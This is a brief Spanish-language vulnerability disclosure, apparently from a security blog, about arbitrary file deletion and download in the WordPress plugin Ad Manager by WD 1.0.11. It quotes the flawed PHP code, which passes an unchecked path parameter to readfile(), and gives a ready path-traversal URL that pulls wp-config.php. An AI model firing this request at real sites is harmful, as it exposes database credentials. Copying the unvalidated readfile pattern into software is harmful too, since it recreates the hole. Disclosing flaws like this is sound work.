Ad Manager by WD 1.0.11

El plugin de gestión publicitaria Ad Manager by WD sufre de varios problemas relacionados con el acceso indebido a ficheros del sistema.

Por un lado tenemos el acceso indebido a la eliminación de prácticamente cualquier fichero del sistema. Esto además se une a la posibilidad, también, mediante el mismo sistema, de descargar cualquier fichero del sistema.

$path = $_GET['path'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Type: text/csv; charset=utf-8');
header('Content-Disposition: attachment; filename=' . basename($path));
readfile($path);

Además, es muy fácil de explotar simplemente haciendo una llamada:

http://example.com/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php

Deja un comentario